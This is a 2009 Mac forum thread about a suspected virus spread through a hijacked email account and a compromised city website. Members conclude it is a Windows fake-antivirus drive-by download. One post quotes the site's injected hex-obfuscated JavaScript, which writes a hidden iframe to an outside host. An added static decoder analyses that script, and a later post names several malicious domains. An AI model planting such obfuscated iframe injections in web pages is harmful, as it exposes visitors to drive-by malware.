Welcome to the MacNN Forums.

Virus for Macs?
gonk
Fresh-Faced Recruit
Join Date: Jan 2007
Jul 20, 2009, 10:39 AM
 
Someone got into my yahoo account last night and sent a virus to everyone in my address book. It definitely infects macs. The virus is an email with no subject, and the link that people are clicking on that gets them infected is to "cityofalexander.org". DO NOT GO TO THAT WEBSITE!!!!!! I just want to know if anyone knows what this is and what to do about it. Thanks.
     
Chito
Senior User
Join Date: Mar 1999
Location: Uniontown, OH
Jul 20, 2009, 10:52 AM
 
It definitely infects macs.

Doubtful.
Never argue with an idiot. They'll drag you down to their level and beat you with experience.
     
OreoCookie
Moderator
Join Date: May 2001
Location: Hilbert space
Jul 20, 2009, 11:35 AM
 
Very, very improbable. It would be the first and without doubt it'd be in the news all over the internet.
I don't suffer from insanity, I enjoy every minute of it.
     
turtle777
Clinically Insane
Join Date: Jun 2001
Location: planning a comeback !
Jul 20, 2009, 12:18 PM
 
Well, I went on cityofalexander.org.

I ignored the two warning pop-ups from Safari, and then the page loads.

Nothing else happens. I guess I'm dead now

-t
     
gonk  (op)
Fresh-Faced Recruit
Join Date: Jan 2007
Jul 20, 2009, 12:48 PM
 
Are you joking? Why would you do that? In any event, I did not post the full URL. If you just go to the domain, I don't know what will happen. Still, you shouldn't do it! The one person I know of that says she got some damage from the virus says it messed up her address book, and she is on a mac, so I take that to mean it can infect macs. I was just hoping that someone here might know something about it. I know there was some talk of some new mac virus a month or so ago and I don't know if this was it or not, or how to clean it off.
     
turtle777
Clinically Insane
Join Date: Jun 2001
Location: planning a comeback !
Jul 20, 2009, 01:06 PM
 
Originally Posted by gonk
Are you joking? Why would you do that? In any event, I did not post the full URL. If you just go to the domain, I don't know what will happen. Still, you shouldn't do it! The one person I know of that says she got some damage from the virus says it messed up her address book, and she is on a mac, so I take that to mean it can infect macs. I was just hoping that someone here might know something about it. I know there was some talk of some new mac virus a month or so ago and I don't know if this was it or not, or how to clean it off.
That's bullsh!t, and I'll prove you wrong.

Give me the full URL, I'll go there and then post a screenshot.

This whole "virus for Mac while surfing" is FUD.

-t
     
OreoCookie
Moderator
Join Date: May 2001
Location: Hilbert space
Jul 20, 2009, 01:11 PM
 
She probably mistook a popup claiming `something really, really bad has happened' for the real thing.
I don't suffer from insanity, I enjoy every minute of it.
     
turtle777
Clinically Insane
Join Date: Jun 2001
Location: planning a comeback !
Jul 20, 2009, 01:22 PM
 
Most likely. My mom did the same thing.

-t
     
gonk  (op)
Fresh-Faced Recruit
Join Date: Jan 2007
Jul 20, 2009, 01:56 PM
 
No, first she said that new addresses were added to her address book. Then those addresses (and mine) disappeared from her address book. Also, now, when she attempts to type my address into the "to" line of mail.app, it puts some new address there instead of mine, one that she does not recognize. She is 600 miles away (give or take) so I can't look at her computer and figure out what the problem is. (She also said her trash can was filling up with stuff, and she emptied the trash, and then more stuff was put in it. We have resolved this problem and it is not related to this virus or malicious website.) But the other issue with the addressbook being messed up still hasn't been resolved. (I mean, it's easy enough to fix the address book, the real question is, what caused it, and how do we get rid of it?) Yes, it's entirely possible that the addressbook was already messed up, (or got messed up some other way) but she sends me email pretty often and it's strange that this would happen right at the same time that this hack happened. I was posting here hoping that others knew about this problem and could help, even if it turns out not to be mac related. I only post it here because we know (or at least think) that this infected at least one mac.

@turtle - NO, I will not post the full URL here. I don't want to be accused of spreading this around. It's obvious this is not a well known (or widespread) problem, which is what I was trying to find out.
     
0157988944
Professional Poster
Join Date: May 2007
Jul 20, 2009, 02:09 PM
 
That's a pretty crappy virus if all it does is change address book listings... and 99% chance it's not a virus, a trojan at best which requires the user to provide a password and allow it to install.
     
ghporter
Administrator
Join Date: Apr 2001
Location: San Antonio TX USA
Jul 20, 2009, 03:16 PM
 
gonk, check your private messages.

There is a lot of mention of a HOAX Mac virus affecting address books, from May or earlier. There is an AppleScript exploit from 2001 that uses address book entries to spread itself, but that's been taken care of by fixes to OS X. Version 10.0 I think, or maybe OS X 10.1.

Glenn -----OTR/L, MOT, Tx
     
seanc
Moderator Emeritus
Join Date: Apr 2005
Location: Cambridge, UK
Jul 20, 2009, 03:41 PM
 
I don't think there's anything wrong with that website.

The most likely issue is that the website/hosting space was hijacked - either through poor security or outdated software.
Either way, it loads a perfectly fine looking, albeit, dated website and doesn't try to run anything.
     
gonk  (op)
Fresh-Faced Recruit
Join Date: Jan 2007
Jul 20, 2009, 04:18 PM
 
@ghporter

Okay, check your PM.

And the OS they are running is 10.5.
     
ghporter
Administrator
Join Date: Apr 2001
Location: San Antonio TX USA
Jul 20, 2009, 05:05 PM
 
First off, the URL ends in a reference to an ".exe" file - these are Windows executable files and they do NOTHING on Macs. Second, the site is marked as an attack site, which is reported by both Safari and Firefox on Macs, even though the Windows executable file is not dangerous to Macs. Third, that executable is a 28k byte file that has as its internal name "DrWeb32.exe", which is a known WINDOWS sham antivirus attack file.

There is NOTHING in the site, or in the file that can by themselves hurt Mac computers. There is NOTHING in the directory in that URL that can hurt a Mac - aside from the Windows executable file it only has a bunch of .gif files and a couple of subdirectories that have a JavaScript in them. That script is the same in every location. Here it is:
Code:
var i,y,x="3c696672616d65207372633d22687474703a2f2f656c656374726f6e69637373656e73652d7365617263682e636f6d2f6367692d62696e2f696e6465782e6367693f757365723322206672616d65626f726465723d223022207374796c653d22646973706c61793a6e6f6e65223e3c2f696672616d653e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);
This is apparently a JavaScript attack, but it has to be opened in a browser or something else that can execute JavaScript.

Basically, if you go past the "Warning, this is an Attack Site" warnings, you MIGHT have a script attack loaded on your computer. But it would have to have YOUR PERMISSION to do anything bad. In fact, you'd have to work at it to get anything on this site to do anything at all to a Mac - there is nothing at all in any of those directories that can hurt your Mac without YOUR help.

Glenn -----OTR/L, MOT, Tx
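
What the script quoted above writes into the page can be recovered without running it, by decoding the hex literal as plain text. This is an added example, not part of the original post: the function names are illustrative, and the hex string is the one from the quoted script.

```javascript
// Added example: static triage of a hex-encoded document.write() injection.
// The quoted script is handled purely as text; nothing is evaluated or fetched.

// The script from the post above, held as an inert string.
const SAMPLE_SCRIPT =
  'var i,y,x="' +
  [
    "3c696672616d6520", "7372633d22", "687474703a2f2f",
    "656c656374726f6e69637373656e7365", "2d736561726368", "2e636f6d",
    "2f6367692d62696e2f", "696e6465782e636769", "3f7573657233", "2220",
    "6672616d65626f72646572", "3d22302220", "7374796c65", "3d22",
    "646973706c61793a6e6f6e65", "223e", "3c2f696672616d653e",
  ].join("") +
  "\";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);";

// Quoted literals made only of hex byte pairs (16+ characters) are decode candidates.
function extractHexLiterals(source) {
  const re = /(["'])((?:[0-9a-fA-F]{2}){8,})\1/g;
  return Array.from(source.matchAll(re), (m) => m[2]);
}

// Same result as the script's unescape('%' + pair) loop, without running it.
function decodeHex(hex) {
  let out = "";
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// Rewrite a URL so it cannot be clicked or auto-linked in a report.
function defang(url) {
  return url.replace(/^http/i, "hxxp").replace(/\./g, "[.]");
}

// Pull out every <iframe> tag and flag the ones styled to be invisible.
function findIframes(html) {
  const frames = [];
  for (const tag of html.matchAll(/<iframe\b([^>]*)>/gi)) {
    const attrs = {};
    const attrRe = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
    for (const a of tag[1].matchAll(attrRe)) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4];
    }
    const src = attrs.src || "";
    let host = "";
    try {
      host = new URL(src).hostname;
    } catch (e) {
      // relative or malformed src: leave host empty
    }
    const style = attrs.style || "";
    const hidden =
      /display\s*:\s*none|visibility\s*:\s*hidden/i.test(style) ||
      attrs.width === "0" ||
      attrs.height === "0";
    frames.push({ src, host, hidden, defanged: defang(src) });
  }
  return frames;
}

// Decode every hex literal in a script and keep the ones that hide an iframe.
function analyzeScript(source) {
  const writesToDocument = /document\.write(ln)?\s*\(/.test(source);
  return extractHexLiterals(source)
    .map((hex) => {
      const decoded = decodeHex(hex);
      return { decoded, writesToDocument, iframes: findIframes(decoded) };
    })
    .filter((finding) => finding.iframes.length > 0);
}

for (const finding of analyzeScript(SAMPLE_SCRIPT)) {
  for (const frame of finding.iframes) {
    console.log(`${frame.hidden ? "HIDDEN" : "visible"} iframe -> ${frame.defanged}`);
  }
}
```

The decoded tag is a zero-border, `display:none` iframe, so the injected page shows nothing to the visitor while the browser still requests the third-party URL.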
     
CharlesS
Posting Junkie
Join Date: Dec 2000
Jul 20, 2009, 05:17 PM
 
Hey, every once in a while a security hole shows up that allows these things to do bad stuff without permission. Whether or not that's the case right now, I don't think it's a good idea to go encouraging people to ignore the security warnings.

Ticking sound coming from a .pkg package? Don't let the .bom go off! Inspect it first with Pacifist. Macworld - five mice!
     
ghporter
Administrator
Join Date: Apr 2001
Location: San Antonio TX USA
Jul 20, 2009, 05:29 PM
 
Originally Posted by CharlesS
Hey, every once in a while a security hole shows up that allows these things to do bad stuff without permission. Whether or not that's the case right now, I don't think it's a good idea to go encouraging people to ignore the security warnings.
I wasn't encouraging anyone to ignore the warnings. The only way you can get to the content on these pages is to ignore the warnings, which was my point. As soon as that big "Attack Site" warning shows up, you should be looking for the back button. It takes completely ignoring the warning to get to the (can't do anything to a Mac) executable file. There's nothing in any of those directories that would even load a web page, just download the executable, which of course cannot do anything at all on a Mac.

Glenn -----OTR/L, MOT, Tx
     
DCJ001
Dedicated MacNNer
Join Date: Oct 2007
Jul 20, 2009, 05:41 PM
 
Originally Posted by gonk
Are you joking? Why would you do that? In any event, I did not post the full URL. If you just go to the domain, I don't know what will happen. Still, you shouldn't do it! The one person I know of that says she got some damage from the virus says it messed up her address book, and she is on a mac, so I take that to mean it can infect macs. I was just hoping that someone here might know something about it. I know there was some talk of some new mac virus a month or so ago and I don't know if this was it or not, or how to clean it off.
Your passion for doing the right thing, by reporting what you believe to be a harmful situation, is appreciated. This message board has a lot of true experts and some sarcastic wanna-be know-it-alls. Your task is done.

If anyone wishes to play with the site, it's up to them.
     
CharlesS
Posting Junkie
Join Date: Dec 2000
Jul 20, 2009, 05:42 PM
 
The part I took issue with was this:

Originally Posted by ghporter
Basically, if you go past the "Warning, this is an Attack Site" warnings, you MIGHT have a script attack loaded on your computer. But it would have to have YOUR PERMISSION to do anything bad. In fact, you'd have to work at it to get anything on this site to do anything at all to a Mac - there is nothing at all in any of those directories that can hurt your Mac without YOUR help.
This is all well and good, until a new exploit turns up that can hurt your Mac without YOUR help or YOUR PERMISSION, through some as-yet-undiscovered security hole. There's been a few of them in the past, and there's no guarantee there won't be more in the future, so I think it's a better policy just to heed the security warnings, regardless of whether it affects your particular Mac or not.

Ticking sound coming from a .pkg package? Don't let the .bom go off! Inspect it first with Pacifist. Macworld - five mice!
     
gonk  (op)
Fresh-Faced Recruit
Join Date: Jan 2007
Jul 20, 2009, 06:06 PM
 
Originally Posted by ghporter
First off, the URL ends in a reference to an ".exe" file-these are Windows executable files and they do NOTHING on Macs.
Except, as I read the URL (and I am NOT claiming to be an expert on URLs), it is making a request to run the exe on the server, not on the user's computer. Of course, I don't know what is going to happen after that, but the fact that there is an exe in the URL isn't really relevant if that exe is running on the server and not the user's computer, right? The URL doesn't really end in exe, as you put it, but .exe?blahblahblah (I don't remember what comes after the question mark, but it was a comma-delimited list of numbers.) Doesn't that cause the exe to run on the server, and not the user's computer? If so, it doesn't matter what computer the user is using.

Basically, if you go past the "Warning, this is an Attack Site" warnings, you MIGHT have a script attack loaded on your computer. But it would have to have YOUR PERMISSION to do anything bad. In fact, you'd have to work at it to get anything on this site to do anything at all to a Mac - there is nothing at all in any of those directories that can hurt your Mac without YOUR help.
If I understand you, you're saying a person who isn't tech savvy, who believes she got an email from a trusted person sending her to this site, just needs to click past one or two warning dialogs to have her computer compromised? Or are you saying the person would have to do real technical work to make the thing dangerous to a mac?

Let's say one did give this thing permission to run its attack, what would it do? Do the people I know that have clicked on it need to do anything about it?
     
ghporter
Administrator
Join Date: Apr 2001
Location: San Antonio TX USA
Jul 20, 2009, 06:13 PM
 
I want to emphasize that I was trying to stress that the warnings are there, and that it is not a good thing to ignore them. DO NOT GO PAST SUCH WARNINGS. I did so in a relatively safe environment with certain safeguards in place to investigate the claims that there was a Mac virus lying in wait there. "Trained professional" and all that (yes, I am a trained computer security specialist). If I've given anyone the impression that I was advocating ignoring the "attack site" warnings, I apologize - that was NOT my intention. The warnings are there for a reason, and especially as CharlesS points out, if someone DOES come up with a Mac exploit, these warnings may be your only way of avoiding it.

Again, DO NOT IGNORE YOUR BROWSER'S WARNINGS. In this case it was not a problem, but tomorrow it could be. Remember, I'm the guy that says the Mac user community is too smug and not suspicious enough - expect there to eventually be Mac threats. This one isn't one.

Glenn -----OTR/L, MOT, Tx
     
ghporter
Administrator
Join Date: Apr 2001
Location: San Antonio TX USA
Jul 20, 2009, 06:20 PM
 
Originally Posted by gonk
Except, as I read the URL (and I am NOT claiming to be an expert on URLs), it is making a request to run the exe on the server, not on the user's computer. Of course, I don't know what is going to happen after that, but the fact that there is an exe in the URL isn't really relevant if that exe is running on the server and not the user's computer, right? The URL doesn't really end in exe, as you put it, but .exe?blahblahblah (I don't remember what comes after the question mark, but it was a comma-delimited list of numbers.) Doesn't that cause the exe to run on the server, and not the user's computer? If so, it doesn't matter what computer the user is using.
Nope. The URL simply asks to download the file. The "blahblahblah" is irrelevant in this case, and may actually be window dressing.
Originally Posted by gonk
If I understand you, you're saying a person who isn't tech savvy, who believes she got an email from a trusted person sending her to this site, just needs to click past one or two warning dialogs to have her computer compromised? Or are you saying the person would have to do real technical work to make the thing dangerous to a mac?
First, these warnings are FULL SCREEN RED BANNERS that basically scream "YOU'RE ABOUT TO DO SOMETHING VERY BAD." Not simple dialog boxes. And you have to look closely to see how you can get past them. They are honestly VERY hard to misinterpret. There are ways to run this sort of file on a Mac, but you have to work at setting them up, and you have to allow them to run. None of this is automatic. Further, the kind of code used in this particular file won't do anything on a Mac, even if you let it, because it's built on low-level Windows functions.
Originally Posted by gonk
Let's say one did give this thing permission to run its attack, what would it do? Do the people I know that have clicked on it need to do anything about it?
On your Mac? Nothing at all, as I said above. Under Windows, it masquerades as an antivirus program or update and then downloads some files which themselves can be malicious - but the specific files downloaded are dependent on which implementation is installed. It's nasty but manageable with any REAL antivirus package, especially the pay packages such as Norton or McAfee.

Glenn -----OTR/L, MOT, Tx
     
gonk  (op)
Fresh-Faced Recruit
Join Date: Jan 2007
Jul 20, 2009, 06:27 PM
 
"It's nasty but manageable with any REAL antivirus package, especially the pay packages such as Norton or McAfee."


Ok, thanks a lot for your help. Is Ad-aware a program you'd put in this category?
     
Spheric Harlot
Clinically Insane
Join Date: Nov 1999
Location: 888500128, C3, 2nd soft.
Jul 20, 2009, 06:45 PM
 
Since Ad-Aware is only available for Windows, I'd not put it in this category.
     
gonk  (op)
Fresh-Faced Recruit
Join Date: Jan 2007
Jul 20, 2009, 07:36 PM
 
Originally Posted by Spheric Harlot
Since Ad-Aware is only available for Windows, I'd not put it in this category.
I'm pretty sure he was talking about windows virus protection software at that point. At least, that's how I read it.
     
Spheric Harlot
Clinically Insane
Join Date: Nov 1999
Location: 888500128, C3, 2nd soft.
Jul 20, 2009, 07:39 PM
 
Ack.

Mea culpa.
     
cgc
Professional Poster
Join Date: Mar 2003
Location: Down by the river
Jul 20, 2009, 08:05 PM
 
Did you get one of those fake AV warning popups that had a link you click on to "solve" the problem (e.g. install a virus)?
     
turtle777
Clinically Insane
Join Date: Jun 2001
Location: planning a comeback !
Jul 20, 2009, 08:07 PM
 
Originally Posted by cgc
Did you get one of those fake AV warning popups that had a link you click on to "solve" the problem (e.g. install a virus)?
No, most likely, he just got the Safari warning. Everything else is hearsay.

Just enter the URL, and you'll see it.

-t
     
gonk  (op)
Fresh-Faced Recruit
Join Date: Jan 2007
Jul 20, 2009, 08:47 PM
 
Originally Posted by cgc
Did you get one of those fake AV warning popups that had a link you click on to "solve" the problem (e.g. install a virus)?
I didn't go to the web site and I'm not planning on doing so. The person who did go said she got some kind of warning, and so she didn't go any further. But then, her address book got messed up somehow. In particular, whenever she types my name into the "to" field of an email, it inserts some Chinese email address in addition to mine. (When I say "Chinese", I mean it ends in ".cn".) She is saying that this only started happening today, after she went to that site, so it seems unlikely that the two events are unrelated, but ghporter is saying that site couldn't have done anything to her mac, so I don't know what's going on here.
     
ghporter
Administrator
Join Date: Apr 2001
Location: San Antonio TX USA
Jul 20, 2009, 09:07 PM
 
Originally Posted by gonk
"It's nasty but manageable with any REAL antivirus package, especially the pay packages such as Norton or McAfee."


Ok, thanks a lot for your help. Is Ad-aware a program you'd put in this category?
Originally Posted by Spheric Harlot
Since Ad-Aware is only available for Windows, I'd not put it in this category.
Originally Posted by gonk
I'm pretty sure he was talking about windows virus protection software at that point. At least, that's how I read it.
I was talking about Windows and Ad Aware is NOT an antivirus package - it's an adware tracking and blocking package. In Windows, go with the free ClamAV (but you may have to wait for updates on emerging threats), or spend the money and get a higher end package like Norton AV or McAfee. Both Norton and McAfee come out with new virus defs very early on their detection. I prefer Norton's interface, but it's more expensive.

And again, if you're using a Mac, this particular issue is no threat at all.

Glenn -----OTR/L, MOT, Tx
     
gonk  (op)
Fresh-Faced Recruit
Join Date: Jan 2007
Jul 20, 2009, 09:10 PM
 
Originally Posted by ghporter
I was talking about Windows and Ad Aware is NOT an antivirus package - it's an adware tracking and blocking package. In Windows, go with the free ClamAV (but you may have to wait for updates on emerging threats), or spend the money and get a higher end package like Norton AV or McAfee. Both Norton and McAfee come out with new virus defs very early on their detection. I prefer Norton's interface, but it's more expensive.

And again, if you're using a Mac, this particular issue is no threat at all.
OK, thanks.
     
mIcahluthier11
Fresh-Faced Recruit
Join Date: Jul 2009
Jul 22, 2009, 07:15 AM
 
The same thing happened to me yesterday. I've also had problems with getting booted off the net. From what I've read in the past couple of hours a trojan got placed in the leaked Erin Anderson ESPN video and affects both pc and mac. The name of the trojan was OSX/Jahlav-C. That being said, does anyone have any leads on any free anti virus apps for 10.5.6? Sorry I looked this up at work's computer so I can't cite my info
     
Spheric Harlot
Clinically Insane
Join Date: Nov 1999
Location: 888500128, C3, 2nd soft.
Jul 22, 2009, 07:40 AM
 
ClamXAV
     
ghporter
Administrator
Join Date: Apr 2001
Location: San Antonio TX USA
Jul 22, 2009, 09:20 AM
 
The trojan cited above is another example of social engineering of Mac users - MacFixIt has a great little article on it.

I particularly like this passage in the article:
Originally Posted by MacFixIt
The best course of action for Mac users is to examine the files they download carefully, especially if you are being asked for your administrator password to install codecs, utilities, or any other unfamiliar application. Most malware resides on disreputable or untrusted Web sites such as pornography sites or in illegally downloaded software packages. Currently there are no self-propagating viruses for the Mac.
In other words, the world is not all safe and wholesome for Mac users, and especially if you download "stuff you shouldn't download," you're playing into malware purveyors' hands.

Glenn -----OTR/L, MOT, Tx
     
TheoCryst
Mac Elite
Join Date: Nov 2005
Location: Seattle, WA, USA
Jul 22, 2009, 02:05 PM
 
Originally Posted by ghporter
I particularly like this passage in the article: In other words, the world is not all safe and wholesome for Mac users, and especially if you download "stuff you shouldn't download," you're playing into malware purveyors' hands.
Yep, and this type of thing is bound to get worse as OS X builds up its marketshare. Remember: NO operating system is 100% bulletproof, and every OS is vulnerable to these trojans.

Any ramblings are entirely my own, and do not represent those of my employers, coworkers, friends, or species
     
Spheric Harlot
Clinically Insane
Join Date: Nov 1999
Location: 888500128, C3, 2nd soft.
Jul 22, 2009, 02:49 PM
 
Make it idiot-proof, and someone will make a better idiot.
     
és:
Fresh-Faced Recruit
Join Date: Feb 2007
Jul 22, 2009, 03:00 PM
 
Originally Posted by gonk
It definitely infects macs.
This is the part that gets people's back up.
     
Spheric Harlot
Clinically Insane
Join Date: Nov 1999
Location: 888500128, C3, 2nd soft.
Jul 22, 2009, 03:41 PM
 
Indeed. "Macs" ought to be capitalized.
     
turtle777
Clinically Insane
Join Date: Jun 2001
Location: planning a comeback !
Jul 22, 2009, 09:58 PM
 
I dream of the day where trojans are NOT called viruses any more *sigh*

-t
     
ghporter
Administrator
Join Date: Apr 2001
Location: San Antonio TX USA
Jul 22, 2009, 10:16 PM
 
turtle, in some parts of Texas, soft drinks are generically called "Cokes." As in "what kind of Coke can I get 'ya?" "Oh, gimme a Dr. Pepper. Mighty kind of you..." In other words, the popular press has made the common term for malware "virus," even though that's only one type of malware. That you know better and I know better won't fix the popular press - who, in thinking they're aiming at a "lowest common denominator" are constantly pushing that denominator lower and lower.

Dream on, but don't bet on a change.

Glenn -----OTR/L, MOT, Tx
     
turtle777
Clinically Insane
Join Date: Jun 2001
Location: planning a comeback !
Jul 22, 2009, 10:29 PM
 
Originally Posted by ghporter
Dream on, but don't bet on a change.
YOU could make a change.

Just hand out temp-bans for misuse of the term virus, and people will learn

-t
     
Gavin
Mac Elite
Join Date: Oct 2000
Location: Seattle
Jul 23, 2009, 01:14 AM
 
Originally Posted by ghporter
turtle, in some parts of Texas, soft drinks are generically called "Cokes." As in "what kind of Coke can I get 'ya?" "Oh, gimme a Dr. Pepper. Mighty kind of you..."
It's the same in California.

Except the conversation is more like:

Dude, ya want a coke?
Dude, right on!
Like... what kind?
Orange Crush me, dude.
     
ghporter
Administrator
Join Date: Apr 2001
Location: San Antonio TX USA
Jul 23, 2009, 08:55 AM
 
Originally Posted by turtle777
YOU could make a change.

Just hand out temp-bans for misuse of the term virus, and people will learn

-t
That kind of "act locally" sort of thing will only work temporarily, and I'd have to do the same sort of "corrective action" so frequently that it would lose its impact. I (or you) can still correct those who misuse terms, much the same way that many of us correct "MAC" posters. I think that's much more effective than anything harsh.

Glenn -----OTR/L, MOT, Tx
     
ghporter
Administrator
Join Date: Apr 2001
Location: San Antonio TX USA
Jul 23, 2009, 08:56 AM
 
Originally Posted by Gavin
It's the same in California.

Except the conversation is more like:

Dude, ya want a coke?
Dude, right on!
Like... what kind?
Orange Crush me, dude.
DUDE! Like AWESOME!

Glenn -----OTR/L, MOT, Tx
     
cvisors
Fresh-Faced Recruit
Join Date: Aug 2002
Location: somewhere in .au
Jul 23, 2009, 09:11 AM
 
Ahh fun another drive by download..

I work in the hosting industry and seeing these sorts of things is getting all too common. The poor city of Alexander has, most likely, looking at the site, had its FTP details stolen. Though this is a nice chunk of JavaScript. Now I haven't seen an exploit like this for Mac OS X as of yet. Though if the truth be known it's only a matter of time, that something like this will happen. And woe and doom and rains of brimstone and fire!

Well not really that bad, but we as a (and I use this term loosely) have been pretty smug over the fact that there hasn't really been any viruses or trojans that don't require user intervention to get into one's machine.

But as the Mac becomes more popular, and becomes a greater target it will happen, just a matter of time really.

Anyway. The major issue right now in the Windows world is not so much Windows itself. Though its security model could be much improved (I am looking forward to seeing how much it has been improved in Windows 7.)

But it seems that the most recent flaws that have caused the issue which is seen by the iframes being inserted in webpages, are exploits in Adobe Acrobat and Flash.

This site is no different other than the iframes I've seen except in nasty nasty JavaScript. Just looking at the page with the inspector going I can see that the block of JS code is trying to open a number of sites.

The first is fragus-test.com which resolves to an IP address in Russia. The next is esli.tw which is hosted in the Netherlands. Next we have electronicssense-search.com, which is a domain registered to a US entity hosted at theplanet. I will prolly fire off an email to the planet, as they are pretty responsive.

So we have three sites trying to run dangerous code on the end user machine via the JavaScript that has been inserted into the page.

But wait, that's not all.

Next we have an iframe like the ones I've seen many of recently. Again another .tw domain which resolves to an IP in the Netherlands. These all seem to be something like domainname.xom/in.cgi?3 or something like that.

Now next we have the same thing, but pointing to a domain best-med-shop.com (no longer active) again this looks similar to the other iframe style exploits. Or could be used to spam Google.

And finally another iframe. Fun!

*sigh* there is too much of this going on right now, and those machines that do get exploited if they have FTP details for the machine owner's site. Another site gets exploited.

The "Warning: Visiting this site may harm your computer" pages are just whack a mole really. By the time it's listed in stop bad ware the damage is done.

~Ivy
Vk3IVY
     
   
 